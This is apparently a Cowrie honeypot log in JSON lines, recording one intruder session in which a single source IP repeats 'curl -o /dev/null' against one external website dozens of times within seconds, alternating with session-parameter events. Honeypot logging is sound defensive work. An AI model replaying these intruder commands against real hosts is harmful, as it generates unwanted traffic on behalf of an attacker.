{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:53.542260Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:53.620243Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:53.621066Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:53.663073Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:53.664086Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:53.715355Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:53.716424Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:53.763442Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:53.764333Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:53.805128Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:53.806012Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:53.844419Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:53.845503Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:53.889538Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:53.890432Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:53.929379Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:53.930617Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:54.058213Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:54.059388Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:54.099674Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:54.100633Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:54.137938Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:54.139256Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:54.186999Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:54.188164Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:54.239399Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:54.240411Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:54.278347Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:54.280308Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:54.319863Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:54.320740Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:54.357071Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:54.358011Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:54.473934Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:54.475285Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:54.512801Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:54.513699Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:54.550440Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:54.551385Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:54.591104Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:54.592187Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:54.631852Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:54.632798Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:54.671261Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:54.672038Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:54.721597Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:54.722704Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:54.759685Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:54.760526Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:54.797472Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:54.798395Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:54.835455Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:54.836342Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:54.873480Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:54.874334Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:54.910568Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:54.911397Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:54.948072Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:54.948982Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:54.986363Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:54.987135Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.023783Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.024887Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.061625Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.062485Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.108857Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.109603Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.146832Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.147880Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.184539Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.185377Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.221938Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.222757Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.259170Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.259941Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.305026Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.305870Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.344359Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.345177Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.382063Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.382860Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.426897Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.427753Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.465280Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.466063Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.512712Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.513500Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.549789Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.550611Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.588195Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.589297Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.626391Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.627227Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.664355Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.665105Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.703065Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.704583Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.750477Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.751393Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.788793Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.789669Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.826626Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.827770Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.865156Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.865962Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.919521Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.920477Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:55.963110Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:55.964242Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:56.015366Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:56.016292Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:56.054238Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:56.055209Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:56.098512Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:56.099391Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:56.138099Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:56.139005Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:56.179675Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:56.180519Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:56.218811Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:56.219578Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:56.258964Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:56.259827Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:56.297508Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:56.298372Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:56.345582Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:56.346410Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:56.385279Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:56.386120Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:56.672992Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
